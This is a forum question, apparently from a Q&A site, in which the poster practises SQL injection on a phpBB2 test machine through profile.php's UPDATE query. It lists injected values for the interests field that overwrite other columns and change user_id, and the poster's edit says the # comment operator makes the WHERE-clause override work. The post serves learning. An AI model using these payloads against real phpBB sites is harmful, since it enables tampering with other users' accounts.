# SQL Injection for PHPBB2 on Profile.php

Tags: mysql, sql, security, sql-injection

This SQL code is vulnerable, but I haven't been able to get the correct code.

Here's the SQL Query:

```
UPDATE phpbb_users SET user_email = 'bob@seed.com', user_icq = '', user_website = '',
user_occ = '', user_from = 'asdasd', user_interests = 'something', user_sig = '', 
user_sig_bbcode_uid = '', user_viewemail = 0, user_aim = '', user_yim = 'asdad', user_msnm = 
'', user_attachsig = 1, user_allowsmile = 1, user_allowhtml = 0, user_allowbbcode = 1, 
user_allow_viewonline = 1, user_notify = 0, user_notify_pm = 1, user_popup_pm = 1, 
user_timezone = 0, user_dateformat = 'D M d, Y g:i a', user_lang = 'english', user_style = 1, 
user_active = 1, user_actkey = '' WHERE user_id = 4
```

I can put something into interests, for example, that can be escaped by a single quote (magic quotes, etc are all off on the machine. It's a test machine for learning).

So, for example, if I put into the interests field this value:

```
 tacos' , user_website = 'www.google.com
```

It will successfully update the interests to "tacos" and the website to "www.google.com". That's not really interesting at all, though...

This is a little more interesting:

```
 tacos', user_id = '100
```

And the user_id is successfully set to 100 for the user, instead of 4. Still not quite so interesting...

I want to be able to modify the user_id that this is happening for -- any way that this might be possible? I've been trying to do things such as

```
 tacos' WHERE user_id = 2; --
```

But those aren't working.

Any idea how I could change the user_id field?

EDIT: Got the answer myself. The comment operator was #. I just wasted an hour. I hope this helps somebody.